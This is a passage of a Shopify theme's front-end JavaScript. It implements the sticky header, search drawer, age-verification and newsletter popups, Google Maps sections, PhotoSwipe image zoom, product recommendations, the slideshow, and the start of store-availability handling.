        ? config.naturalHeaderHeight
        : siteHeader.offsetHeight;

      stickyWrap.style.height = height + 'px';
    }

    function getStickyNavAnchor() {
      if (!siteHeader) {
        return null;
      }

      return siteHeader.querySelector('.page-width > .text-center')
        || siteHeader.querySelector('.text-center .site-navigation')
        || siteHeader.querySelector('.site-navigation.medium-down--hide');
    }

    function cacheStickyScrollThreshold() {
      if (!siteHeader || config.stickyActive) {
        return config.stickyScrollThreshold;
      }

      var navAnchor = getStickyNavAnchor();

      if (navAnchor) {
        var navRect = navAnchor.getBoundingClientRect();
        config.stickyScrollThreshold = Math.max(0, Math.round(window.scrollY + navRect.top));
        return config.stickyScrollThreshold;
      }

      var stickyWrap = document.getElementById(config.stickyHeaderWrapper);

      if (stickyWrap) {
        var wrapRect = stickyWrap.getBoundingClientRect();
        config.stickyScrollThreshold = Math.max(0, Math.round(window.scrollY + wrapRect.bottom));
        return config.stickyScrollThreshold;
      }

      cacheNaturalHeaderHeight();
      config.stickyScrollThreshold = config.naturalHeaderHeight || 0;
      return config.stickyScrollThreshold;
    }

    function getStickyScrollThreshold() {
      return cacheStickyScrollThreshold();
    }

    function stickyHeaderScroll() {
      if (!config.stickyEnabled) {
        return;
      }

      if (!config.stickyActive) {
        cacheStickyScrollThreshold();
      }

      requestAnimationFrame(scrollHandler);

      config.lastScroll = window.scrollY;
    }

    function scrollHandler() {
      var threshold = getStickyScrollThreshold();
      var shouldStick = window.scrollY >= threshold;

      if (shouldStick) {
        if (config.stickyActive) {
          return;
        }

        config.naturalHeaderHeight = siteHeader.offsetHeight;
        document.documentElement.style.setProperty('--header-natural-height', config.naturalHeaderHeight + 'px');
        config.stickyActive = true;

        siteHeader.classList.add(config.stickyClass);
        if (config.wrapperOverlayed) {
          wrapper.classList.remove(config.overlayedClass);
        }

        stickyHeaderHeight();

        // Add open transition class after element is set to fixed
        // so CSS animation is applied correctly
        setTimeout(function() {
          if (!config.stickyActive) {
            return;
          }

          siteHeader.classList.add(config.openTransitionClass);
          document.body.classList.add('stick-header-custom');
          stickyHeaderHeight();
        }, 100);
      } else {
        if (!config.stickyActive) {
          return;
        }

        config.stickyActive = false;

        siteHeader.classList.remove(config.openTransitionClass);
        document.body.classList.remove('stick-header-custom');
        siteHeader.classList.remove(config.stickyClass);
        if (config.wrapperOverlayed) {
          wrapper.classList.add(config.overlayedClass);
        }

        requestAnimationFrame(function() {
          stickyHeaderHeight();
          updateHeaderAndAnnouncementBarHeight();
        });
      }
    }
  
    function searchDrawer() {
      document.querySelectorAll(selectors.searchBtn).forEach(btn => {
        btn.addEventListener('click', function(evt) {
          evt.preventDefault();
          evt.stopPropagation();
          document.dispatchEvent(new CustomEvent('predictive-search:open', {
            detail: {
              context: 'header'
            },
            bubbles: true
          }));
  
          // add is-active class to .site-header__search-container
          document.querySelector(selectors.searchContainer).classList.add('is-active');
        });
      });
  
      document.addEventListener('predictive-search:close-all', function(e) {
        if (!e.detail || !e.detail.element) {
          closeSearchDrawer();
          return;
        }
        const parent = e.detail.element.parentElement;
        if (parent && parent.classList.contains('custom-close')) {
          closeSearchDrawerCustomClose();
        } else {
          closeSearchDrawer();
        }
      });
    }
  
    function closeSearchDrawerCustomClose(evt) {
      // Do not close if click event came from inside drawer
      if (evt) {
        // evt.path is non-standard, so have fallback
        var path = evt.path || (evt.composedPath && evt.composedPath());
        for (var i = 0; i < path.length; i++) {
          if (path[i].classList) {
            if (path[i].classList.contains('site-header__search-btn')) {
              break;
            }
  
            if (path[i].classList.contains('site-header__search-container')) {
              return;
            }
          }
        }
      }
  
      // deselect any focused form elements
      document.activeElement.blur();
  
      document.documentElement.classList.add('js-drawer-closing');
      document.documentElement.classList.remove('js-drawer-open', 'js-drawer-open--search');
  
      window.setTimeout(function() {
        document.documentElement.classList.remove('js-drawer-closing');
      }.bind(this), 500);
  
      var container = document.querySelector(selectors.searchContainer);
      if (container) {
        theme.utils.prepareTransition(container, function() {
          container.classList.remove('is-active');
        }.bind(this));
      }
    } 
    
    function closeSearchDrawer(evt) {
      // Do not close if click event came from inside drawer
      if (evt) {
        // evt.path is non-standard, so have fallback
        var path = evt.path || (evt.composedPath && evt.composedPath());
        for (var i = 0; i < path.length; i++) {
          if (path[i].classList) {
            if (path[i].classList.contains('site-header__search-btn')) {
              break;
            }
  
            if (path[i].classList.contains('site-header__search-container')) {
              return;
            }
          }
        }
      }
  
      // deselect any focused form elements
      document.activeElement.blur();
  
      document.documentElement.classList.add('js-drawer-closing');
      document.documentElement.classList.remove('js-drawer-open', 'js-drawer-open--search');
  
      window.setTimeout(function() {
        document.documentElement.classList.remove('js-drawer-closing');
      }.bind(this), 500);
  
      var container = document.querySelector(selectors.searchContainer);
      theme.utils.prepareTransition(container, function() {
        container.classList.remove('is-active');
      }.bind(this));
    }
  
    function menuDetailsHandler() {
      const navDetails = document.querySelectorAll(selectors.navDetails);
  
      navDetails.forEach((navDetail) => {
        const summary = navDetail.querySelector('summary');
  
        // if the navDetail is open, then close it when the user clicks outside of it
        document.addEventListener('click', (evt) => {
  
          if (navDetail.hasAttribute('open') && !navDetail.contains(evt.target)) {
            navDetail.removeAttribute('open');
            summary.setAttribute('aria-expanded', 'false');
          } else {
            if (navDetail.hasAttribute('open')) {
              summary.setAttribute('aria-expanded', 'false');
            } else {
              summary.setAttribute('aria-expanded', 'true');
            }
          }
        });
      });
    }
  
    return {
      init: init,
      disableOverlayHeader: disableOverlayHeader
    };
  })();
  

  /*============================================================================
    Age Verification Popup
  ==============================================================================*/
  
  class AgeVerificationPopup extends HTMLElement {
    constructor() {
      super();
  
      this.cookieName = this.id;
      this.cookie = Cookies.get(this.cookieName);
  
      this.classes = {
        activeContent: 'age-verification-popup__content--active',
        inactiveContent: 'age-verification-popup__content--inactive',
        inactiveDeclineContent: 'age-verification-popup__decline-content--inactive',
        activeDeclineContent: 'age-verification-popup__decline-content--active',
      }
  
      this.declineButton = this.querySelector('[data-age-verification-popup-decline-button]');
      this.declineContent = this.querySelector('[data-age-verification-popup-decline-content]');
      this.content = this.querySelector('[data-age-verification-popup-content]');
      this.returnButton = this.querySelector('[data-age-verification-popup-return-button]');
      this.exitButton = this.querySelector('[data-age-verification-popup-exit-button]');
      this.backgroundImage = this.querySelector('[data-background-image]');
      this.mobileBackgroundImage = this.querySelector('[data-mobile-background-image]');
  
      if (Shopify.designMode) {
        document.addEventListener('shopify:section:select', (event) => {
          if (event.detail.sectionId === this.dataset.sectionId) {
            this.init();
          }
        })
  
        document.addEventListener('shopify:section:load', (event) => {
          if (event.detail.sectionId === this.dataset.sectionId) {
            this.init();
  
            // If 'Test mode' is enabled, remove the cookie we've set
            if (this.dataset.testMode === 'true' && this.cookie) {
              Cookies.remove(this.cookieName);
            }
  
            // Check session storage if user was editing on the second view
            const secondViewVisited = sessionStorage.getItem(this.id);
  
            if (!secondViewVisited) return;
  
            this.showDeclineContent();
          }
        })
  
        document.addEventListener('shopify:section:unload', (event) => {
          if (event.detail.sectionId === this.dataset.sectionId) {
            this.modal.close();
          }
        })
      }
  
      // Age verification popup will only be hidden if test mode is disabled AND
      // either a cookie exists OR visibility is toggled in the editor
      if ((this.cookie) && this.dataset.testMode === 'false') return;
  
      this.init();
    }
  
    init() {
      this.modal = new theme.Modals(this.id, 'age-verification-popup-modal', {
        closeOffContentClick: false
      });
  
      if (this.backgroundImage) {
        this.backgroundImage.style.display = 'block';
      }
  
      if (theme.config.bpSmall && this.mobileBackgroundImage) {
        this.mobileBackgroundImage.style.display = 'block';
      }
  
      this.modal.open();
  
      theme.a11y.lockMobileScrolling(`#${this.id}`, document.querySelector('#MainContent'));
  
      if (this.declineButton) {
        this.declineButton.addEventListener('click', (e) => {
          e.preventDefault();
          this.showDeclineContent();
  
          // If in editor, save to session storage to indicate that user has moved on to the second view
          // Allows view to persist while making changes in the editor
          if (Shopify.designMode) {
            sessionStorage.setItem(this.id, 'second-view');
          }
        });
      }
  
      if (this.returnButton) {
        this.returnButton.addEventListener('click', (e) => {
          e.preventDefault();
          this.hideDeclineContent();
  
          // Remove data from session storage so second view doesn't persist
          const secondViewVisited = sessionStorage.getItem(this.id);
  
          if (Shopify.designMode && secondViewVisited) {
            sessionStorage.removeItem(this.id);
          }
        })
      }
  
      if (this.exitButton) {
        this.exitButton.addEventListener('click', (e) => {
          e.preventDefault();
  
          // We don't want to set a cookie if in test mode
          if (this.dataset.testMode === 'false') {
            Cookies.set(this.cookieName, 'entered', { expires: 30, sameSite: 'none', secure: true });
          }
  
          if (this.backgroundImage) {
            this.backgroundImage.style.display = 'none';
          }
  
          if (theme.config.bpSmall && this.mobileBackgroundImage) {
            this.mobileBackgroundImage.style.display = 'none';
          }
  
          this.modal.close();
  
          theme.a11y.unlockMobileScrolling(`#${this.id}`, document.querySelector('#MainContent'));
        })
      }
    }
  
    showDeclineContent() {
      this.declineContent.classList.remove(this.classes.inactiveDeclineContent);
      this.declineContent.classList.add(this.classes.activeDeclineContent);
  
      this.content.classList.add(this.classes.inactiveContent);
      this.content.classList.remove(this.classes.activeContent);
    }
  
    hideDeclineContent() {
      this.declineContent.classList.add(this.classes.inactiveDeclineContent);
      this.declineContent.classList.remove(this.classes.activeDeclineContent);
  
      this.content.classList.remove(this.classes.inactiveContent);
      this.content.classList.add(this.classes.activeContent);
    }
  }
  
  customElements.define('age-verification-popup', AgeVerificationPopup);
  
  
  
  theme.Maps = (function() {
    var config = {
      zoom: 14
    };
    var apiStatus = null;
    var mapsToLoad = [];
  
    var errors = {};
  
    var selectors = {
      section: '[data-section-type="map"]',
      map: '[data-map]',
      mapOverlay: '.map-section__overlay'
    };
  
    // Global function called by Google on auth errors.
    // Show an auto error message on all map instances.
    window.gm_authFailure = function() {
      if (!Shopify.designMode) {
        return;
      }
  
      document.querySelectorAll(selectors.section).forEach(section => {
        section.classList.add('map-section--load-error');
      });
  
      document.querySelectorAll(selectors.map).forEach(map => {
        map.parentNode.removeChild(map);
      });
  
      window.mapError(theme.strings.authError);
    };
  
    window.mapError = function(error) {
      var message = document.createElement('div');
      message.classList.add('map-section__error', 'errors', 'text-center');
      message.innerHTML = error;
      document.querySelectorAll(selectors.mapOverlay).forEach(overlay => {
        overlay.parentNode.prepend(message);
      });
      document.querySelectorAll('.map-section__link').forEach(link => {
        link.classList.add('hide');
      });
    };
  
    function Map(container) {
      this.container = container;
      this.sectionId = this.container.getAttribute('data-section-id');
      this.namespace = '.map-' + this.sectionId;
      this.map = container.querySelector(selectors.map);
      this.key = this.map.dataset.apiKey;
  
      errors = {
        addressNoResults: theme.strings.addressNoResults,
        addressQueryLimit: theme.strings.addressQueryLimit,
        addressError: theme.strings.addressError,
        authError: theme.strings.authError
      };
  
      if (!this.key) {
        return;
      }
  
      theme.initWhenVisible({
        element: this.container,
        callback: this.prepMapApi.bind(this),
        threshold: 20
      });
    }
  
    // API has loaded, load all Map instances in queue
    function initAllMaps() {
      mapsToLoad.forEach(instance => {
        instance.createMap();
      });
    }
  
    function geolocate(map) {
      var geocoder = new google.maps.Geocoder();
  
      if (!map) {
        return;
      }
  
      var address = map.dataset.addressSetting;
  
      var deferred = new Promise((resolve, reject) => {
        geocoder.geocode({ address: address }, function(results, status) {
          if (status !== google.maps.GeocoderStatus.OK) {
            reject(status);
          }
          resolve(results);
        });
      });
  
      return deferred;
    }
  
    Map.prototype = Object.assign({}, Map.prototype, {
      prepMapApi: function() {
        if (apiStatus === 'loaded') {
          this.createMap();
        } else {
          mapsToLoad.push(this);
  
          if (apiStatus !== 'loading') {
            apiStatus = 'loading';
            if (typeof window.google === 'undefined' || typeof window.google.maps === 'undefined' ) {
  
              var script = document.createElement('script');
              script.onload = function () {
                apiStatus = 'loaded';
                initAllMaps();
              };
              script.src = 'https://maps.googleapis.com/maps/api/js?key=' + this.key;
              document.head.appendChild(script);
            }
          }
        }
      },
  
      createMap: function() {
        var mapDiv = this.map;
  
        return geolocate(mapDiv)
          .then(
            function(results) {
              var mapOptions = {
                zoom: config.zoom,
                backgroundColor: 'none',
                center: results[0].geometry.location,
                draggable: false,
                clickableIcons: false,
                scrollwheel: false,
                disableDoubleClickZoom: true,
                disableDefaultUI: true
              };
  
              var map = (this.map = new google.maps.Map(mapDiv, mapOptions));
              var center = (this.center = map.getCenter());
  
              var marker = new google.maps.Marker({
                map: map,
                position: map.getCenter()
              });
  
              google.maps.event.addDomListener(
                window,
                'resize',
                theme.utils.debounce(250, function() {
                  google.maps.event.trigger(map, 'resize');
                  map.setCenter(center);
                  mapDiv.removeAttribute('style');
                })
              );
  
              if (Shopify.designMode) {
                if (window.AOS) { AOS.refreshHard() }
              }
            }.bind(this)
          )
          .catch(function(status) {
            var errorMessage;
  
            switch (status) {
              case 'ZERO_RESULTS':
                errorMessage = errors.addressNoResults;
                break;
              case 'OVER_QUERY_LIMIT':
                errorMessage = errors.addressQueryLimit;
                break;
              case 'REQUEST_DENIED':
                errorMessage = errors.authError;
                break;
              default:
                errorMessage = errors.addressError;
                break;
            }
  
            // Show errors only to merchant in the editor.
            if (Shopify.designMode) {
              window.mapError(errorMessage);
            }
          });
      },
  
      onUnload: function() {
        if (this.map.length === 0) {
          return;
        }
        // Causes a harmless JS error when a section without an active map is reloaded
        if (google && google.maps && google.maps.event) {
          google.maps.event.clearListeners(this.map, 'resize');
        }
      }
    });
  
    return Map;
  })();
  
  theme.NewsletterPopup = (function () {
    function NewsletterPopup(container) {
      this.container = container;
      var sectionId = this.container.getAttribute('data-section-id');
  
      this.cookieName = 'newsletter-' + sectionId;
      this.cookie = Cookies.get(this.cookieName);
  
      if (!container) {
        return;
      }
  
      // Prevent popup on Shopify robot challenge page
      if (window.location.pathname === '/challenge') {
        return;
      }
  
      // Prevent popup on password page
      if (window.location.pathname === '/password') {
        return;
      }
  
      this.data = {
        secondsBeforeShow: container.dataset.delaySeconds,
        daysBeforeReappear: container.dataset.delayDays,
        hasReminder: container.dataset.hasReminder,
        testMode: container.dataset.testMode
      };
  
      this.modal = new theme.Modals('NewsletterPopup-' + sectionId, 'newsletter-popup-modal');
  
      // Set cookie if optional button is clicked
      var btn = container.querySelector('.popup-cta a');
      if (btn) {
        btn.addEventListener('click', function () {
          this.closePopup(true);
        }.bind(this));
      }
  
      // Open modal if errors or success message exist
      if (container.querySelector('.errors') || container.querySelector('.note--success')) {
        this.modal.open();
      }
  
      // Set cookie as opened if success message
      if (container.querySelector('.note--success')) {
        this.closePopup(true);
        return;
      }
  
      document.addEventListener('modalClose.' + container.id, this.closePopup.bind(this));
  
      if (!this.cookie) {
        this.initPopupDelay();
      }
  
      // Open modal if triggered by newsletter reminder
      document.addEventListener('reminder:openNewsletter', () => {
        this.modal.open();
      });
    }
  
    NewsletterPopup.prototype = Object.assign({}, NewsletterPopup.prototype, {
      initPopupDelay: function () {
        if (this.data.testMode === 'true') {
          return;
        }
        setTimeout(function () {
          const newsletterAppeared = (sessionStorage.getItem('newsletterAppeared') === 'true');
          if (newsletterAppeared) {
            const openReminder = new CustomEvent('newsletter:openReminder', { bubbles: true });
            this.container.dispatchEvent(openReminder);
          } else {
            this.modal.open();
            sessionStorage.setItem('newsletterAppeared', true);
          }
  
        }.bind(this), this.data.secondsBeforeShow * 1000);
      },
  
      closePopup: function (success) {
        // Remove a cookie in case it was set in test mode
        if (this.data.testMode === 'true') {
          Cookies.remove(this.cookieName, { path: '/' });
          return;
        }
  
        var expiry = success ? 200 : this.data.daysBeforeReappear;
        var hasReminder = (this.data.hasReminder === 'true');
        var reminderAppeared = (sessionStorage.getItem('reminderAppeared') === 'true');
  
        if (hasReminder && reminderAppeared) {
          Cookies.set(this.cookieName, 'opened', { path: '/', expires: expiry });
        } else if(!hasReminder) {
          Cookies.set(this.cookieName, 'opened', { path: '/', expires: expiry });
        }
      },
  
      onLoad: function () {
        this.modal.open();
      },
  
      onSelect: function () {
        this.modal.open();
      },
  
      onDeselect: function () {
        this.modal.close();
      },
  
      onBlockSelect: function () {
        this.modal.close();
      },
  
      onBlockDeselect: function () {
        this.modal.open();
      },
  
      onUnload: function() {
        this.modal.close();
      }
    });
  
    return NewsletterPopup;
  })();
  
  theme.PasswordHeader = (function() {
    function PasswordHeader() {
      this.init();
    }
  
    PasswordHeader.prototype = Object.assign({}, PasswordHeader.prototype, {
      init: function() {
        if (!document.querySelector('#LoginModal')) {
          return;
        }
  
        var passwordModal = new theme.Modals('LoginModal', 'login-modal', {
          focusIdOnOpen: 'password',
          solid: true
        });
  
        // Open modal if errors exist
        if (document.querySelectorAll('.errors').length) {
          passwordModal.open();
        }
      }
    });
  
    return PasswordHeader;
  })();
  
  theme.Photoswipe = (function() {
    var selectors = {
      trigger: '.js-photoswipe__zoom',
      images: '.photoswipe__image',
      slideshowTrack: '.flickity-viewport ',
      activeImage: '.is-selected'
    };
  
    function Photoswipe(container, sectionId) {
      this.container = container;
      this.sectionId = sectionId;
      this.namespace = '.photoswipe-' + this.sectionId;
      this.gallery;
      this.images;
      this.items;
      this.inSlideshow = false;
  
      if (!container || container.dataset.zoom === 'false') {
        return;
      }
  
      this.init();
    }
  
    Photoswipe.prototype = Object.assign({}, Photoswipe.prototype, {
      init: function() {
        this.container.querySelectorAll(selectors.trigger).forEach(trigger => {
          trigger.on('click' + this.namespace, this.triggerClick.bind(this));
        });
      },
  
      triggerClick: function(evt) {
        // Streamline changes between a slideshow and
        // stacked images, so recheck if we are still
        // working with a slideshow when initializing zoom
        if (this.container.dataset && this.container.dataset.hasSlideshow === 'true') {
          this.inSlideshow = true;
        } else {
          this.inSlideshow = false;
        }
  
        this.items = this.getImageData();
  
        var image = this.inSlideshow ? this.container.querySelector(selectors.activeImage) : evt.currentTarget;
  
        var index = this.inSlideshow ? this.getChildIndex(image) : image.dataset.index;
  
        this.initGallery(this.items, index);
      },
  
      // Because of image set feature, need to get index based on location in parent
      getChildIndex: function(el) {
        var i = 0;
        while( (el = el.previousSibling) != null ) {
          i++;
        }
  
        // 1-based index required
        return i + 1;
      },
  
      getImageData: function() {
        this.images = this.inSlideshow
                        ? this.container.querySelectorAll(selectors.slideshowTrack + selectors.images)
                        : this.container.querySelectorAll(selectors.images);
  
        var items = [];
  
        this.images.forEach(function(el) {
          var w = parseInt(el.getAttribute('data-photoswipe-width'), 10);
          var h = parseInt(el.getAttribute('data-photoswipe-height'), 10);
          if (!w || !h) {
            w = el.naturalWidth || parseInt(el.getAttribute('width'), 10) || 0;
            h = el.naturalHeight || parseInt(el.getAttribute('height'), 10) || 0;
          }
          if (!w || !h) {
            w = 1;
            h = 1;
          }

          // Zoom URL is capped (e.g. 1800px); small source files stay intrinsic (e.g. 1080). PhotoSwipe
          // sizes the layer from w/h, so 1800 vs 1080 at scale(1) looked like different zoom levels.
          // Scale dimensions up so the long edge matches the theme zoom cap — same layout frame as
          // high-res assets (bitmap may soften slightly on small files).
          var zoomCap = parseInt(el.getAttribute('data-photoswipe-zoom-cap'), 10) || 1800;
          var maxEdge = Math.max(w, h);
          if (maxEdge > 0 && maxEdge < zoomCap) {
            var scale = zoomCap / maxEdge;
            w = Math.round(w * scale);
            h = Math.round(h * scale);
          }
  
          items.push({
            msrc: el.currentSrc || el.src,
            src: el.getAttribute('data-photoswipe-src'),
            w: w,
            h: h,
            el: el
          });
        });
  
        return items;
      },
  
      initGallery: function(items, index) {
        var pswpElement = document.querySelectorAll('.pswp')[0];
        var self = this;
  
        var options = {
          allowPanToNext: false,
          captionEl: false,
          closeOnScroll: false,
          counterEl: false,
          history: false,
          index: index - 1,
          pinchToClose: false,
          preloaderEl: false,
          // v4 only computes fitRatio / initialZoomLevel for 'fit' or 'orig'. 'zoom' skips that path and yields unstable zoom (e.g. first slide ~4–9x).
          scaleMode: 'fit',
          showAnimationDuration: 0,
          hideAnimationDuration: 0,
          shareEl: false,
          tapToToggleControls: false,
          /**
           * Default PhotoSwipe: (isClick || fit < 0.7) ? 1 : 1.33 — when isClick is true (desktop zoom
           * button / image click) the target was always 1, while touch double-tap used 1 or 1.33.
           * Combined with slightly different fit per slide (often the first after hi-res load), zoom-in
           * felt inconsistent. Use the same targets as double-tap for every slide; pair with
           * afterChange + updateSize so each slide's fit is recalculated after it becomes active.
           */
          getDoubleTapZoom: function(isClick, item) {
            if (!item || item.initialZoomLevel == null) {
              return 1;
            }
            return item.initialZoomLevel < 0.7 ? 1 : 1.33;
          },
          getThumbBoundsFn: function(index) {
            var pageYScroll = window.pageYOffset || document.documentElement.scrollTop;
            var thumbnail = items[index].el;
            var rect = thumbnail.getBoundingClientRect();
            return {x:rect.left, y:rect.top + pageYScroll, w:rect.width};
          }
        }
  
        this.gallery = new PhotoSwipe(pswpElement, PhotoSwipeUI_Default, items, options);
        this.gallery.listen('afterChange', function() {
          self.afterChange.call(self);
          requestAnimationFrame(function() {
            if (self.gallery && typeof self.gallery.updateSize === 'function') {
              self.gallery.updateSize(true);
            }
          });
        });
        this.gallery.listen('imageLoadComplete', function(loadIndex) {
          if (!self.gallery || loadIndex !== self.gallery.getCurrentIndex()) {
            return;
          }
          requestAnimationFrame(function() {
            if (self.gallery && typeof self.gallery.updateSize === 'function') {
              self.gallery.updateSize(true);
            }
          });
        });
        this.gallery.init();
  
        this.preventiOS15Scrolling();
      },
  
      afterChange: function() {
        var index = this.gallery.getCurrentIndex();
        this.container.dispatchEvent(new CustomEvent('photoswipe:afterChange', {
          detail: {
            index: index
          }
        }));
      },
  
      syncHeight: function() {
        document.documentElement.style.setProperty(
          "--window-inner-height", 
          `${window.innerHeight}px`
        );
      },
  
      // Fix poached from https://gist.github.com/dimsemenov/0b8c255c0d87f2989e8ab876073534ea
      preventiOS15Scrolling: function() {
        let initialScrollPos;
  
        if (!/iPhone|iPad|iPod/i.test(window.navigator.userAgent)) return; 
        
        this.syncHeight();
              
        // Store scroll position to restore it later
        initialScrollPos = window.scrollY;
        
        // Add class to root element when PhotoSwipe opens
        document.documentElement.classList.add('pswp-open-in-ios');
  
        window.addEventListener('resize', this.syncHeight);
      
        this.gallery.listen('destroy', () => {
          document.documentElement.classList.remove('pswp-open-in-ios');
          window.scrollTo(0, initialScrollPos);
        });
      }
    });
  
    return Photoswipe;
  })();
  
  
  /*============================================================================
    ProductRecommendations
  ==============================================================================*/
  
  class ProductRecommendations extends HTMLElement {
    constructor() {
      super();
      this.el = this;
      this.url = this.dataset.url;
      this.intent = this.dataset.intent;
      this.placeholder = this.querySelector('.product-recommendations-placeholder');
      this.productResults =  this.querySelector('.grid-product');
      this.sectionId = this.dataset.sectionId;
      this.blockId = this.dataset.blockId;
  
      document.addEventListener('recommendations:loaded', (e) => {
        this.colorImages = this.el.querySelectorAll('.grid-product__color-image');
        if (this.colorImages.length) {
          this.swatches = this.el.querySelectorAll('.color-swatch--with-image');
          this.colorSwatchHovering();
        }
      });
    }
  
    connectedCallback() {
      fetch(this.url)
        .then(response => response.text())
        .then(text => {
  
        const html = document.createElement('div');
        html.innerHTML = text;
        const recommendations = html.querySelector('.product-recommendations');
  
        if (!recommendations) {
          this.el.classList.add('hide');
          if (AOS) { AOS.refreshHard() }
          return;
        }
  
        this.placeholder.innerHTML = '';
        this.placeholder.innerHTML = recommendations.innerHTML;
  
        theme.reinitProductGridItem(this.el);
  
        this.slideshow = this.querySelector('[data-slideshow]');
  
        if (this.slideshow) {
          this.setupSlider();
        }
  
        document.dispatchEvent(new CustomEvent('recommendations:loaded', {
          detail: {
            section: this.el,
            intent: this.intent
          }
        }));
  
        })
        .catch(e => {
          console.error(e);
        });
    }
  
    setupSlider() {
      const controlType = this.slideshow.dataset.controls;
      const perSlide = parseFloat(this.slideshow.dataset.perSlide);
      const count = parseFloat(this.slideshow.dataset.count);
  
      let prevNextButtons = false;
      let pageDots = true;
  
      if (controlType === 'arrows') {
        pageDots = false;
        prevNextButtons = true;
      }
  
      if (perSlide < count) {
        this.flickity = new theme.Slideshow(this.slideshow, {
          prevNextButtons,
          pageDots,
          adaptiveHeight: true,
          wrapAround: false,
        });
      }
    }
  
    colorSwatchHovering() {
      this.swatches.forEach(swatch => {
        swatch.addEventListener('mouseenter', function() {
          this.setActiveColorImage(swatch);
        }.bind(this));
  
        swatch.addEventListener('touchstart', function(evt) {
          evt.preventDefault();
          this.setActiveColorImage(swatch);
        }.bind(this), {passive: true});
  
        swatch.addEventListener('mouseleave', function() {
          this.removeActiveColorImage(swatch);
        }.bind(this));
      });
    }
  
    setActiveColorImage(swatch) {
      const id = swatch.dataset.variantId;
      const image = swatch.dataset.variantImage;
  
      // Unset all active swatch images
      this.colorImages.forEach(el => {
        el.classList.remove('is-active');
      });
  
      // Unset all active swatches
      this.swatches.forEach(el => {
        el.classList.remove('is-active');
      });
  
      // Set active image and swatch
      const imageEl = this.el.querySelector(`.grid-product__color-image--${id}`);
  
      imageEl.style.backgroundImage = 'url(' + image + ')';
      imageEl.classList.add('is-active');
      swatch.classList.add('is-active');
  
      // Update product grid item href with variant URL
      const variantUrl = swatch.dataset.url;
      const gridItem = swatch.closest('.grid-item__link');
      gridItem.setAttribute('href', variantUrl);
    }
  
    removeActiveColorImage(swatch) {
      const id = swatch.dataset.variantId;
      this.el.querySelector(`.grid-product__color-image--${id}`).classList.remove('is-active');
    }
  }
  
  customElements.define('product-recommendations', ProductRecommendations);
  
  theme.SlideshowSection = (function() {
  
    var selectors = {
      parallaxContainer: '.parallax-container'
    };
  
    function SlideshowSection(container) {
      this.container = container;
      var sectionId = container.getAttribute('data-section-id');
      this.slideshow = container.querySelector('#Slideshow-' + sectionId);
      this.namespace = '.' + sectionId;
  
      this.initialIndex = 0;
  
      if (!this.slideshow) { return }
  
      // Get shopify-created div that section markup lives in,
      // then get index of it inside its parent
      var sectionEl = container.parentElement;
      var sectionIndex = [].indexOf.call(sectionEl.parentElement.children, sectionEl);
  
      if (sectionIndex === 0) {
        this.init();
      } else {
        theme.initWhenVisible({
          element: this.container,
          callback: this.init.bind(this)
        });
      }
  
    }
  
    SlideshowSection.prototype = Object.assign({}, SlideshowSection.prototype, {
      init: function() {
        var slides = this.slideshow.querySelectorAll('.slideshow__slide');
  
        this.slideshow.classList.remove('loading', 'loading--delayed');
        this.slideshow.classList.add('loaded');
  
        if (slides.length > 1) {
          var autoplaySpeed = parseInt(this.slideshow.dataset.speed, 10);
          if (isNaN(autoplaySpeed) || autoplaySpeed <= 0) {
            autoplaySpeed = 7000;
          }

          var sliderArgs = {
            prevNextButtons: this.slideshow.hasAttribute('data-arrows'),
            pageDots: this.slideshow.hasAttribute('data-dots'),
            fade: true,
            setGallerySize: false,
            initialIndex: this.initialIndex,
            pauseAutoPlayOnHover: false,
            autoPlay: this.slideshow.dataset.autoplay === 'true'
              ? autoplaySpeed
              : false
          };
  
          this.flickity = new theme.Slideshow(this.slideshow, sliderArgs);
        } else {
          // Add loaded class to first slide
          slides[0].classList.add('is-selected');
        }
      },
  
      forceReload: function() {
        this.onUnload();
        this.init();
      },
  
      onUnload: function() {
        if (this.flickity && typeof this.flickity.destroy === 'function') {
          this.flickity.destroy();
        }
      },
  
      onDeselect: function() {
        if (this.flickity && typeof this.flickity.play === 'function') {
          this.flickity.play();
        }
      },
  
      onBlockSelect: function(evt) {
        var slide = this.slideshow.querySelector('.slideshow__slide--' + evt.detail.blockId)
        var index = parseInt(slide.dataset.index);
  
        if (this.flickity && typeof this.flickity.pause === 'function') {
          this.flickity.goToSlide(index);
          this.flickity.pause();
        } else {
          // If section reloads, slideshow might not have been setup yet, wait a second and try again
          this.initialIndex = index;
          setTimeout(function() {
            if (this.flickity && typeof this.flickity.pause === 'function') {
              this.flickity.pause();
            }
          }.bind(this), 1000);
        }
      },
  
      onBlockDeselect: function() {
        if (this.flickity && typeof this.flickity.play === 'function') {
          if (this.flickity.args.autoPlay) {
            this.flickity.play();
          }
        }
      }
    });
  
    return SlideshowSection;
  })();
  
  theme.StoreAvailability = (function() {
    var selectors = {
      drawerOpenBtn: '.js-drawer-open-availability',
      modalOpenBtn: '.js-modal-open-availability',
      productTitle: '[data-availability-product-title]',
      preorderLeadTime: '[data-nf-preorder-lead-time]',
      preorderLeadTimeText: '[data-nf-preorder-lead-time-text]',
      preorderMessage: '.gPreorderBottomMessage'
    };

    function StoreAvailability(container) {
      this.container = container;
      this.baseUrl = container.dataset.baseUrl;
      this.productTitle = container.dataset.productName;

      // Globo Preorder determines the real lead time asynchronously and dispatches
      // this event with the text it also renders below the add-to-cart button.
      // Copy it into the pickup drawer rows waiting on data-nf-preorder-lead-time.
      // Bound reference kept so destroy() can remove this exact listener —
      // a fresh instance is created per product/quick view, so without cleanup
      // each one leaks a listener on document that outlives its container.
      this.boundApplyPreorderLeadTime = this.applyPreorderLeadTime.bind(this);
      document.addEventListener('globo.preorder.show.preorder', this.boundApplyPreorderLeadTime);
      this.relocatedDrawer = null;
    }

    StoreAvailability.prototype = Object.assign({}, StoreAvailability.prototype, {
      destroy: function() {
        document.removeEventListener('globo.preorder.show.preorder', this.boundApplyPreorderLeadTime);
        if (this.relocatedDrawer) {
          this.relocatedDrawer.remove();
          this.relocatedDrawer = null;
        }
      },

      updateContent: function(variantId) {
        var variantSectionUrl =
          this.baseUrl +
          '/variants/' +
          variantId +
          '/?section_id=store-availability';

        var self = this;

        fetch(variantSectionUrl)
          .then(function(response) {
            return response.text();
          })
          .then(function(html) {
            // A drawer relocated to <body> by a previous call (see below) lives
            // outside self.container now, so the innerHTML swap below never
            // removes it — drop it ourselves before the fresh markup arrives,
            // otherwise two elements end up sharing #StoreAvailabilityDrawer.
            if (self.relocatedDrawer) {
              self.relocatedDrawer.remove();
              self.relocatedDrawer = null;
            }

            if (html.trim() === '') {
              this.container.innerHTML = '';
              return;
            }

            self.container.innerHTML = html;
            self.container.innerHTML = self.container.firstElementChild.innerHTML;

            // Setup drawer if have open button
